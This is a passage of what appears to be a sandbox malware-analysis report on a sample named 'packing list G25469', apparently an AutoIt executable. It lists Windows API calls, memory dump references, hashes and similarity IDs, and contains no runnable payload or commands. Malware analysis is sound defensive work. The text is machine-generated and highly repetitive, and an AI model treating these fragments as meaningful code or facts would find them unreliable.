                                                  • Instruction ID: a68a6ad59cee2610ad1ec5b107c6c939e0f84a6a37890a915ef212e16b374bf5
                                                  • Opcode Fuzzy Hash: 0a23f37a676b2343b922c384cb7062c16d6300382ea0c197760d08dd9fd841cb
                                                  • Instruction Fuzzy Hash: 0EF03AF9550308BAE2106B64EC45F777AECDB04B54F004471BE08D71A2DA759E1086A8
                                                  APIs
                                                    • Part of subcall function 00B4AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B4AFE3
                                                    • Part of subcall function 00B4AF83: SelectObject.GDI32(?,00000000), ref: 00B4AFF2
                                                    • Part of subcall function 00B4AF83: BeginPath.GDI32(?), ref: 00B4B009
                                                    • Part of subcall function 00B4AF83: SelectObject.GDI32(?,00000000), ref: 00B4B033
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B9EA8E
                                                  • LineTo.GDI32(00000000,?,?), ref: 00B9EA9B
                                                  • EndPath.GDI32(00000000), ref: 00B9EAAB
                                                  • StrokePath.GDI32(00000000), ref: 00B9EAB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                  • String ID:
                                                  • API String ID: 1539411459-0
                                                  • Opcode ID: 690ff43e1cd22c455bee71be215dbddfdfb804eeb8b6931ba30a378152377a99
                                                  • Instruction ID: 17ef2c0810f61d35568cf1050ad555fb8ba63ef153531711462ef62dd639b3d5
                                                  • Opcode Fuzzy Hash: 690ff43e1cd22c455bee71be215dbddfdfb804eeb8b6931ba30a378152377a99
                                                  • Instruction Fuzzy Hash: 97F0823104525ABBDF12AFA8AC0DFCE3F59AF16311F084241FE11A20F1CBB89651DB99
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B6C84A
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B6C85D
                                                  • GetCurrentThreadId.KERNEL32 ref: 00B6C864
                                                  • AttachThreadInput.USER32(00000000), ref: 00B6C86B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 2710830443-0
                                                  • Opcode ID: c2d868f0b28d7a8f345de93a1d52e98732ca52a6012e0859235d159919495b09
                                                  • Instruction ID: e5c91c749dcd255d24a13638ae2152fb15fe06a81973ecf8c106e492b2547cc7
                                                  • Opcode Fuzzy Hash: c2d868f0b28d7a8f345de93a1d52e98732ca52a6012e0859235d159919495b09
                                                  • Instruction Fuzzy Hash: FBE0657114122877DB201F61DC0DEEB7F5CEF057A1F408111B60D96450EAB9C980CBE0
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00B6B0D6
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B6AC9D), ref: 00B6B0DD
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B6AC9D), ref: 00B6B0EA
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B6AC9D), ref: 00B6B0F1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: e0c5178e803c17e135045dcb33155bc671a04e034b9be8920017eedd201122a5
                                                  • Instruction ID: b9358c0eb9843705cc97681a961b55ccb6ce4b6d86be1996991b4803908867a3
                                                  • Opcode Fuzzy Hash: e0c5178e803c17e135045dcb33155bc671a04e034b9be8920017eedd201122a5
                                                  • Instruction Fuzzy Hash: 44E04F366412129BD7202FB15C1CF473BECEF55791F018968E645D7040EEAC84418B60
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00B4B496
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00B4B4A0
                                                  • SetBkMode.GDI32(?,00000001), ref: 00B4B4B5
                                                  • GetStockObject.GDI32(00000005), ref: 00B4B4BD
                                                  • GetWindowDC.USER32(?,00000000), ref: 00BADE2B
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BADE38
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00BADE51
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00BADE6A
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00BADE8A
                                                  • ReleaseDC.USER32(?,00000000), ref: 00BADE95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: 69b00d208be6e9e0efcf0de29552545bd0c8ff45c15c2af1170a4ac388586ca0
                                                  • Instruction ID: c1411756d257bf13df6f0bc50282f9bd12e9cfcbbaaf460657095edaea43e3e8
                                                  • Opcode Fuzzy Hash: 69b00d208be6e9e0efcf0de29552545bd0c8ff45c15c2af1170a4ac388586ca0
                                                  • Instruction Fuzzy Hash: FFE0ED35104240AFDF215B68AC09BD83B51EB52336F14C766F6AAA90E1DBB58681DB11
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: 437e081bdbc9ed187b132d31420f7870e57b0e57771e06aa894e524e000a0c81
                                                  • Instruction ID: 738f359eddfc6ee3040d8b4d1ae85992e49da684405e92c692380e38219d9205
                                                  • Opcode Fuzzy Hash: 437e081bdbc9ed187b132d31420f7870e57b0e57771e06aa894e524e000a0c81
                                                  • Instruction Fuzzy Hash: EEE046B5500204EFDB005F70C888A6E7BE8EB4C350F11CA5AFC5BCB211EFB89940AB50
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B6B2DF
                                                  • UnloadUserProfile.USERENV(?,?), ref: 00B6B2EB
                                                  • CloseHandle.KERNEL32(?), ref: 00B6B2F4
                                                  • CloseHandle.KERNEL32(?), ref: 00B6B2FC
                                                    • Part of subcall function 00B6AB24: GetProcessHeap.KERNEL32(00000000,?,00B6A848), ref: 00B6AB2B
                                                    • Part of subcall function 00B6AB24: HeapFree.KERNEL32(00000000), ref: 00B6AB32
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: 4e65b34e815f559b56f0ac836b9f519507f80387c07be9f6e2021b2fc32c880d
                                                  • Instruction ID: 641ea0aae06afb8b7a2b36b1f3710084b158fca51f09311a2d671677b333eb55
                                                  • Opcode Fuzzy Hash: 4e65b34e815f559b56f0ac836b9f519507f80387c07be9f6e2021b2fc32c880d
                                                  • Instruction Fuzzy Hash: FDE0BF3A104005BFCB012B95DC08859FBA6FF883213148722F61582571DF769871EF55
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: bfa052cc12bfe7d25c7df538499b21efb3916b4f8053240ed27f2a1350a79c33
                                                  • Instruction ID: d87bf4a041124ddd362149a45c89f495f7829a562fda160227420016e6a6d169
                                                  • Opcode Fuzzy Hash: bfa052cc12bfe7d25c7df538499b21efb3916b4f8053240ed27f2a1350a79c33
                                                  • Instruction Fuzzy Hash: B1E046B5900200EFDB005F70C88862D7BE8EB4C350F118A1AFD5ACB211EFB899009B10
                                                  APIs
                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00B6DEAA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ContainedObject
                                                  • String ID: AutoIt3GUI$Container
                                                  • API String ID: 3565006973-3941886329
                                                  • Opcode ID: 2de99889fb02b17079967f7dbc53e17e909d38fe5ffce094a70afdfb295779d4
                                                  • Instruction ID: bd0da15e3a0a5082cbc06ab3fbc8ed476a37add7020f9fde83bdd0db6b68a623
                                                  • Opcode Fuzzy Hash: 2de99889fb02b17079967f7dbc53e17e909d38fe5ffce094a70afdfb295779d4
                                                  • Instruction Fuzzy Hash: F7913774A00601AFDB14DF64C884B6AB7F9FF49710F2085ADF94ACB291DB75E941CB60
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00B4BCDA
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00B4BCF3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: ff33bd048cbb75be6bf5a7c34b58ee50d38a1a95aa9f8aa99a691a20a50cbda8
                                                  • Instruction ID: 22796ccda4ed1663e6a437d03441a4b6ff65996e9d84c2daab46e719243e9a46
                                                  • Opcode Fuzzy Hash: ff33bd048cbb75be6bf5a7c34b58ee50d38a1a95aa9f8aa99a691a20a50cbda8
                                                  • Instruction Fuzzy Hash: F3512B714187449BE320AF14DC85BAFBBECFF94354F41489DF5C8420A6DF708668A756
                                                  APIs
                                                    • Part of subcall function 00B344ED: __fread_nolock.LIBCMT ref: 00B3450B
                                                  • _wcscmp.LIBCMT ref: 00B7C65D
                                                  • _wcscmp.LIBCMT ref: 00B7C670
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: FILE
                                                  • API String ID: 4029003684-3121273764
                                                  • Opcode ID: 6daf601ff23b3c79a7c85e016cf98ddba361852f56895c48cae4a80feba04868
                                                  • Instruction ID: 867600d1b8dc891f961afc6260804bd2b572c7aa2ea5dd1b9d2cf0c93d1c7673
                                                  • Opcode Fuzzy Hash: 6daf601ff23b3c79a7c85e016cf98ddba361852f56895c48cae4a80feba04868
                                                  • Instruction Fuzzy Hash: F641B876A0020A7ADF209AA49C81FEF7BF9EF49714F1044B9F615EB181DB71AA048B51
                                                  APIs
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B9A85A
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B9A86F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: '
                                                  • API String ID: 3850602802-1997036262
                                                  • Opcode ID: 358fbd91df0567fc575e633e637ea0c7125a194d81677f16f7ce69c49ac02f81
                                                  • Instruction ID: 2b8edd3fc0d042856543f6abcbd372c01a14857561619ad586a0fd5786755268
                                                  • Opcode Fuzzy Hash: 358fbd91df0567fc575e633e637ea0c7125a194d81677f16f7ce69c49ac02f81
                                                  • Instruction Fuzzy Hash: 1541E875A012099FDF14CFA8D881BEA7BF9FB08300F1445AAE905EB341D774A941CFA1
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B85190
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00B851C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: 969ca150a266e4e3545f0d996b8af7c28927df4f715dcace18ab42fd08ea3c7d
                                                  • Instruction ID: 033db20b11377dcdac7b0b194aa109bd5dbed52a5bfe32441680a3340145df87
                                                  • Opcode Fuzzy Hash: 969ca150a266e4e3545f0d996b8af7c28927df4f715dcace18ab42fd08ea3c7d
                                                  • Instruction Fuzzy Hash: DC310971800119ABCF11EFE4CC85AEEBFB9FF18710F100095E815B6166EA31A956DBA0
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00B9980E
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B9984A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: 0d1d2426866a28f039144f138ead811a859b11dca0f73918e97c08059848bdc8
                                                  • Instruction ID: 7aa668fdb31359328b4ca04d45e832c6a31b3639548709596c7710eb14027165
                                                  • Opcode Fuzzy Hash: 0d1d2426866a28f039144f138ead811a859b11dca0f73918e97c08059848bdc8
                                                  • Instruction Fuzzy Hash: 06316B71110604AAEF109F68CC80BBB77E9FF59760F10866DF9A9C7190DB35AC81D760
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B751C6
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B75201
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 6cdb94423bcef40e7e8648170abef34f26a80da4c88e1734836c54e6fe1a7d3f
                                                  • Instruction ID: 6709548a18d5992a7e9b4d91c99973661115fd13292b0c18b4911c034ce4ab19
                                                  • Opcode Fuzzy Hash: 6cdb94423bcef40e7e8648170abef34f26a80da4c88e1734836c54e6fe1a7d3f
                                                  • Instruction Fuzzy Hash: 8E310631600308DBEB34CF99D885BAEBBF4EF45350F1480D9E9A9A71A1D7F09A44CB10
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __snwprintf
                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                  • API String ID: 2391506597-2584243854
                                                  • Opcode ID: 8bc81fe69fe1e2de9ecfd572033b3a8b2eb43b1974be2641aba03463d8db5524
                                                  • Instruction ID: a0aceb4c801633ec8f1971497e90203e9ba1e3ca47054c3430491e8f8ba3207c
                                                  • Opcode Fuzzy Hash: 8bc81fe69fe1e2de9ecfd572033b3a8b2eb43b1974be2641aba03463d8db5524
                                                  • Instruction Fuzzy Hash: 7B217171600158AFCF24EFA4D882EEE77F4AF45700F1044E9F505AB161EB70EA45CBA1
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B9945C
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B99467
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: e4919aaa8e659cfeb269a35da1dcda492488c1cf3870890e3bc10ac34fe2a0b8
                                                  • Instruction ID: 0d672a8270db069376f0f75ebcaddcab799b3419aba8b3b49ee9ec374ada8657
                                                  • Opcode Fuzzy Hash: e4919aaa8e659cfeb269a35da1dcda492488c1cf3870890e3bc10ac34fe2a0b8
                                                  • Instruction Fuzzy Hash: 3F118271310208AFEF62DF58DC81EBB37AEEB583A4F104179F919973A0D6719C528760
                                                  APIs
                                                    • Part of subcall function 00B4D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B4D1BA
                                                    • Part of subcall function 00B4D17C: GetStockObject.GDI32(00000011), ref: 00B4D1CE
                                                    • Part of subcall function 00B4D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B4D1D8
                                                  • GetWindowRect.USER32(00000000,?), ref: 00B99968
                                                  • GetSysColor.USER32(00000012), ref: 00B99982
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: b0fedd2ccd690de236c390619f5b5e6ddcc32c4dd7f2d8a2ee909a17d8166f64
                                                  • Instruction ID: 1fd3f9a2e1d137b93b727ef1629755fbbadc77124444daaf83fa8d49c5da2a16
                                                  • Opcode Fuzzy Hash: b0fedd2ccd690de236c390619f5b5e6ddcc32c4dd7f2d8a2ee909a17d8166f64
                                                  • Instruction Fuzzy Hash: A4111472520209AFDF04DFB8C845AEA7BE8EB08344F014A6CF956E3250E775E850DB60
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00B99699
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B996A8
